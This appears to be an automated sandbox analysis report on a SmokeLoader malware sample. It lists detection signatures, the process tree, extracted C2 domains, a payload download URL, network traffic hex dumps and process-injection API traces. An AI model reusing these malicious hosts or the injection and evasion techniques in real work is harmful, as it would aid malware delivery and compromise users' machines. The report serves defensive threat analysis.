Loading ...

Play interactive tourEdit tour

Windows Analysis Report qhQ6armJ25.exe

Overview

General Information

Sample Name:qhQ6armJ25.exe
Analysis ID:528745
MD5:9953acb0fee6c45fc5aa12d21ac3ad1b
SHA1:afaf20c658c307f53e804639710c2dce09e9c3ba
SHA256:5231916fbeb9c166a9bbb4e7c576b210019a3a84c17cbe777cb099ab3aad5dd8
Tags:DofoilexeSmokeLoader
Infos:

Most interesting Screenshot:

Detection

SmokeLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Benign windows process drops PE files
Yara detected SmokeLoader
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Injects a PE file into a foreign processes
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Contains functionality to inject code into remote processes
Deletes itself after installation
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Checks if the current machine is a virtual machine (disk enumeration)
Uses 32bit PE files
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Downloads executable code via HTTP
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • qhQ6armJ25.exe (PID: 7112 cmdline: "C:\Users\user\Desktop\qhQ6armJ25.exe" MD5: 9953ACB0FEE6C45FC5AA12D21AC3AD1B)
    • qhQ6armJ25.exe (PID: 7144 cmdline: "C:\Users\user\Desktop\qhQ6armJ25.exe" MD5: 9953ACB0FEE6C45FC5AA12D21AC3AD1B)
      • explorer.exe (PID: 3424 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • D380.exe (PID: 6328 cmdline: C:\Users\user\AppData\Local\Temp\D380.exe MD5: 61BA8F1EDCD03481D6447E8EC34DC383)
          • D380.exe (PID: 5456 cmdline: C:\Users\user\AppData\Local\Temp\D380.exe MD5: 61BA8F1EDCD03481D6447E8EC34DC383)
  • gahfeaj (PID: 5032 cmdline: C:\Users\user\AppData\Roaming\gahfeaj MD5: 9953ACB0FEE6C45FC5AA12D21AC3AD1B)
    • gahfeaj (PID: 6344 cmdline: C:\Users\user\AppData\Roaming\gahfeaj MD5: 9953ACB0FEE6C45FC5AA12D21AC3AD1B)
  • cleanup

Malware Configuration

Threatname: SmokeLoader

{"C2 list": ["http://nalirou70.top/", "http://xacokuo80.top/"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.834313384.0000000000460000.00000004.00000001.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
    00000001.00000002.765681019.0000000000640000.00000004.00000001.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
      00000002.00000000.748566688.0000000004F01000.00000020.00020000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
        00000005.00000002.834484758.00000000005A1000.00000004.00020000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
          00000001.00000002.765917923.0000000002051000.00000004.00020000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security

            Sigma Overview

            No Sigma rule has matched

            Jbx Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Found malware configurationShow sources
            Source: 00000005.00000002.834313384.0000000000460000.00000004.00000001.sdmpMalware Configuration Extractor: SmokeLoader {"C2 list": ["http://nalirou70.top/", "http://xacokuo80.top/"]}
            Multi AV Scanner detection for submitted fileShow sources
            Source: qhQ6armJ25.exeVirustotal: Detection: 45%Perma Link
            Antivirus detection for URL or domainShow sources
            Source: http://nalirou70.top/Avira URL Cloud: Label: phishing
            Source: http://privacytoolzfor-you7000.top/downloads/toolspab2.exeAvira URL Cloud: Label: malware
            Multi AV Scanner detection for domain / URLShow sources
            Source: privacytoolzfor-you7000.topVirustotal: Detection: 6%Perma Link
            Source: xacokuo80.topVirustotal: Detection: 7%Perma Link
            Source: nalirou70.topVirustotal: Detection: 10%Perma Link
            Source: http://xacokuo80.top/Virustotal: Detection: 7%Perma Link
            Machine Learning detection for sampleShow sources
            Source: qhQ6armJ25.exeJoe Sandbox ML: detected
            Machine Learning detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Roaming\gahfeajJoe Sandbox ML: detected
            Source: C:\Users\user\AppData\Local\Temp\D380.exeJoe Sandbox ML: detected
            Source: qhQ6armJ25.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
            Source: Binary string: xd?#C:\kotofaru\tenexut.pdbP+C source: qhQ6armJ25.exe, gahfeaj.2.dr
            Source: Binary string: C:\loc vetudigalol\6_di.pdbP+C source: D380.exe, 00000004.00000000.800740573.0000000000401000.00000020.00020000.sdmp, D380.exe, 00000004.00000002.820427647.0000000000401000.00000020.00020000.sdmp, D380.exe, 00000006.00000000.817319243.0000000000401000.00000020.00020000.sdmp, D380.exe.2.dr
            Source: Binary string: C:\loc vetudigalol\6_di.pdb source: D380.exe, 00000004.00000000.800740573.0000000000401000.00000020.00020000.sdmp, D380.exe, 00000004.00000002.820427647.0000000000401000.00000020.00020000.sdmp, D380.exe, 00000006.00000000.817319243.0000000000401000.00000020.00020000.sdmp, D380.exe.2.dr
            Source: Binary string: C:\kotofaru\tenexut.pdb source: qhQ6armJ25.exe, gahfeaj.2.dr

            Networking:

            barindex
            System process connects to network (likely due to code injection or exploit)Show sources
            Source: C:\Windows\explorer.exeDomain query: nalirou70.top
            Source: C:\Windows\explorer.exeDomain query: privacytoolzfor-you7000.top
            Source: C:\Windows\explorer.exeDomain query: xacokuo80.top
            C2 URLs / IPs found in malware configurationShow sources
            Source: Malware configuration extractorURLs: http://nalirou70.top/
            Source: Malware configuration extractorURLs: http://xacokuo80.top/
            Source: Joe Sandbox ViewASN Name: RAPMSB-ASRU RAPMSB-ASRU
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Thu, 25 Nov 2021 17:24:50 GMTContent-Type: application/x-msdos-programContent-Length: 302592Connection: closeLast-Modified: Thu, 25 Nov 2021 17:24:01 GMTETag: "49e00-5d1a03d96f132"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b0 b4 92 23 f4 d5 fc 70 f4 d5 fc 70 f4 d5 fc 70 9b a3 57 70 dd d5 fc 70 9b a3 62 70 e5 d5 fc 70 9b a3 56 70 97 d5 fc 70 fd ad 6f 70 ff d5 fc 70 f4 d5 fd 70 03 d5 fc 70 9b a3 53 70 f5 d5 fc 70 9b a3 66 70 f5 d5 fc 70 9b a3 61 70 f5 d5 fc 70 52 69 63 68 f4 d5 fc 70 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 2a 7d 9d 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 08 03 00 00 b4 7c 01 00 00 00 00 20 7c 01 00 00 10 00 00 00 20 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 00 80 01 00 04 00 00 6b 2c 05 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 fe 02 00 78 00 00 00 00 70 7e 01 f8 67 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 7e 01 d4 17 00 00 20 14 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 7a 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 cc 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 28 06 03 00 00 10 00 00 00 08 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 c0 41 7b 01 00 20 03 00 00 14 00 00 00 0c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 67 00 00 00 70 7e 01 00 68 00 00 00 20 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 a8 14 01 00 00 e0 7e 01 00 16 01 00 00 88 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://edwxjxx.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 151Host: xacokuo80.top
            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kwcurllpj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 356Host: xacokuo80.top
            Source: global trafficHTTP traffic detected: GET /downloads/toolspab2.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: privacytoolzfor-you7000.top
            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tpjfndspxp.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 306Host: xacokuo80.top
            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tpjfndspxp.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 306Host: xacokuo80.topData Raw: 10 87 8a 95 6c 84 dc b4 cc 4b 0d 33 7b cf 90 8d 42 13 a8 37 d2 35 1f ed cf 9b db fe 88 a4 e0 84 1f b2 5a a5 1d 1a c5 e0 ec d9 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd a2 91 ba 77 d4 75 24 f3 c4 84 de 9e 66 5d 02 c9 a1 c1 64 5d dc cc 36 26 d3 5c 15 b2 01 6a 5c 14 07 e7 84 ce 30 cc b0 ae b5 3d 25 0d 30 1d be 6b 73 be 6e 00 63 62 97 66 e0 b8 67 ab 40 59 0e 6f 97 fc 77 29 7e b2 4f c1 96 77 61 fb e0 26 d2 56 0d 0a f9 29 cc 4f ad b9 ea ab 97 56 d4 22 82 28 2a 6c 5c 55 83 3d f7 b0 64 f9 f8 08 b9 9b 37 1f 15 be e3 e1 99 93 5d 6f b6 f5 80 bc b1 22 6a d9 9e dc f1 00 7c 14 6e 37 a8 b2 45 18 22 b9 f9 9b 25 99 7f 72 52 fc 51 43 bc 8e 1e c0 79 c4 3d c7 b3 36 77 c8 6f ed b0 95 49 97 de 45 26 d5 7a 3a b5 ba f8 c8 3f fc 8e 26 60 d2 7a 96 a4 79 42 fb be 60 a5 42 dc 55 54 0f 49 a2 fa 1d 5c 12 aa a1 3e 00 7b 47 1f 6c d6 d6 23 0d f4 60 fe 70 1a 03 b7 e6 44 69 47 9c 07 29 d9 50 d2 a2 e2 a2 54 8d cb e8 60 d8 2f 0d 66 Data Ascii: lK3{B75Zwmwu$f]d]6&\j\0=%0ksncbfg@Yow)~Owa&V)OV"(*l\U=d7]o"j|n7E"%rRQCy=6woIE&z:?&`zyB`BUTI\>{Gl#`pDiG)PT`/f
            Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tpjfndspxp.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 306Host: xacokuo80.topData Raw: 10 87 8a 95 6c 84 dc b4 cc 4b 0d 33 7b cf 90 8d 42 13 a8 37 d2 35 1f ed cf 9b db fe 88 a4 e0 84 1f b2 5a a5 1d 1a c5 e0 ec d9 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd a2 91 ba 77 d4 75 24 f3 c4 84 de 9e 66 5d 02 c9 a1 c1 64 5d dc cc 36 26 d3 5c 15 b2 01 6a 5c 14 07 e7 84 ce 30 cc b0 ae b5 3d 25 0d 30 1d be 6b 73 be 6e 00 63 62 97 66 e0 b8 67 ab 40 59 0e 6f 97 fc 77 29 7e b2 4f c1 96 77 61 fb e0 26 d2 56 0d 0a f9 29 cc 4f ad b9 ea ab 97 56 d4 22 82 28 2a 6c 5c 55 83 3d f7 b0 64 f9 f8 08 b9 9b 37 1f 15 be e3 e1 99 93 5d 6f b6 f5 80 bc b1 22 6a d9 9e dc f1 00 7c 14 6e 37 a8 b2 45 18 22 b9 f9 9b 25 99 7f 72 52 fc 51 43 bc 8e 1e c0 79 c4 3d c7 b3 36 77 c8 6f ed b0 95 49 97 de 45 26 d5 7a 3a b5 ba f8 c8 3f fc 8e 26 60 d2 7a 96 a4 79 42 fb be 60 a5 42 dc 55 54 0f 49 a2 fa 1d 5c 12 aa a1 3e 00 7b 47 1f 6c d6 d6 23 0d f4 60 fe 70 1a 03 b7 e6 44 69 47 9c 07 29 d9 50 d2 a2 e2 a2 54 8d cb e8 60 d8 2f 0d 66 Data Ascii: lK3{B75Zwmwu$f]d]6&\j\0=%0ksncbfg@Yow)~Owa&V)OV"(*l\U=d7]o"j|n7E"%rRQCy=6woIE&z:?&`zyB`BUTI\>{Gl#`pDiG)PT`/f
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 25 Nov 2021 17:24:50 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 0d 0a 14 00 00 00 7b fa f0 1d b5 69 2b 2c 47 fa 0e a8 c1 82 9f 4f 1a c4 da 16 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 19{i+,GO0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 25 Nov 2021 17:24:50 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d1 95 4f 11 6a 11 e9 b2 83 bd a6 0b a2 13 cc 2f ae 59 4a c3 55 a1 b9 67 f4 25 45 51 b8 f6 cb 41 e1 0e 88 16 95 e1 63 da 7d b3 ef d2 01 79 e4 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OOj/YJUg%EQAc}yc0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Thu, 25 Nov 2021 17:25:02 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 78 61 63 6f 6b 75 6f 38 30 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at xacokuo80.top Port 80</address></body></html>0
            Source: unknownHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://edwxjxx.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 151Host: xacokuo80.top
            Source: unknownDNS traffic detected: queries for: nalirou70.top
            Source: global trafficHTTP traffic detected: GET /downloads/toolspab2.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: privacytoolzfor-you7000.top

            Key, Mouse, Clipboard, Microphone and Screen Capturing:

            barindex
            Yara detected SmokeLoaderShow sources
            Source: Yara matchFile source: 00000005.00000002.834313384.0000000000460000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.765681019.0000000000640000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000000.748566688.0000000004F01000.00000020.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.834484758.00000000005A1000.00000004.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.765917923.0000000002051000.00000004.00020000.sdmp, type: MEMORY
            Source: D380.exe, 00000004.00000002.820813732.0000000001F09000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
            Source: qhQ6armJ25.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
            Source: C:\Users\user\Desktop\qhQ6armJ25.exeCode function: 1_2_00401813 Sleep,NtTerminateProcess,1_2_00401813
            Source: C:\Users\user\Desktop\qhQ6armJ25.exeCode function: 1_2_00401842 Sleep,NtTerminateProcess,1_2_00401842
            Source: C:\Users\user\Desktop\qhQ6armJ25.exeCode function: 1_2_00402052 NtQuerySystemInformation,NtQuerySystemInformation,1_2_00402052
            Source: C:\Users\user\Desktop\qhQ6armJ25.exeCode function: 1_2_00402403 NtEnumerateKey,NtEnumerateKey,1_2_00402403
            Source: C:\Users\user\Desktop\qhQ6armJ25.exeCode function: 1_2_00401812 Sleep,NtTerminateProcess,1_2_00401812
            Source: C:\Users\user\Desktop\qhQ6armJ25.exeCode function: 1_2_0040202C NtQuerySystemInformation,NtQuerySystemInformation,1_2_0040202C
            Source: C:\Users\user\Desktop\qhQ6armJ25.exeCode function: 1_2_00401830 Sleep,NtTerminateProcess,1_2_00401830
            Source: C:\Users\user\Desktop\qhQ6armJ25.exeCode function: 1_2_00401833 Sleep,NtTerminateProcess,1_2_00401833
            Source: C:\Users\user\Desktop\qhQ6armJ25.exeCode function: 1_2_00401836 Sleep,NtTerminateProcess,1_2_00401836
            Source: C:\Users\user\Desktop\qhQ6armJ25.exeCode function: 1_2_004023D9 NtEnumerateKey,1_2_004023D9
            Source: C:\Users\user\Desktop\qhQ6armJ25.exeCode function: 1_1_00402052 NtQuerySystemInformation,NtQuerySystemInformation,1_1_00402052
            Source: C:\Users\user\Desktop\qhQ6armJ25.exeCode function: 1_1_004023D9 NtEnumerateKey,1_1_004023D9
            Source: C:\Users\user\Desktop\qhQ6armJ25.exeCode function: 1_1_00402403 NtEnumerateKey,NtEnumerateKey,1_1_00402403
            Source: C:\Users\user\Desktop\qhQ6armJ25.exeCode function: 1_1_0040202C NtQuerySystemInformation,NtQuerySystemInformation,1_1_0040202C
            Source: C:\Users\user\AppData\Local\Temp\D380.exeCode function: 4_2_01D20110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,4_2_01D20110
            Source: C:\Users\user\AppData\Roaming\gahfeajCode function: 5_2_00401813 Sleep,NtTerminateProcess,5_2_00401813
            Source: C:\Users\user\AppData\Roaming\gahfeajCode function: 5_2_00401842 Sleep,NtTerminateProcess,5_2_00401842
            Source: C:\Users\user\AppData\Roaming\gahfeajCode function: 5_2_00402052 NtQuerySystemInformation,NtQuerySystemInformation,5_2_00402052
            Source: C:\Users\user\AppData\Roaming\gahfeajCode function: 5_2_00402403 NtEnumerateKey,NtEnumerateKey,5_2_00402403
            Source: C:\Users\user\AppData\Roaming\gahfeajCode function: 5_2_00401812 Sleep,NtTerminateProcess,5_2_00401812
            Source: C:\Users\user\AppData\Roaming\gahfeajCode function: 5_2_0040202C NtQuerySystemInformation,NtQuerySystemInformation,5_2_0040202C
            Source: C:\Users\user\AppData\Roaming\gahfeajCode function: 5_2_00401830 Sleep,NtTerminateProcess,5_2_00401830
            Source: C:\Users\user\AppData\Roaming\gahfeajCode function: 5_2_00401833 Sleep,NtTerminateProcess,5_2_00401833
            Source: C:\Users\user\AppData\Roaming\gahfeajCode function: 5_2_00401836 Sleep,NtTerminateProcess,5_2_00401836
            Source: C:\Users\user\AppData\Roaming\gahfeajCode function: 5_2_004023D9 NtEnumerateKey,5_2_004023D9
            Source: qhQ6armJ25.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: qhQ6armJ25.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: D380.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: D380.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: gahfeaj.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: gahfeaj.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: C:\Windows\explorer.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: webio.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: qhQ6armJ25.exeVirustotal: Detection: 45%
            Source: qhQ6armJ25.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\qhQ6armJ25.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\qhQ6armJ25.exe "C:\Users\user\Desktop\qhQ6armJ25.exe"
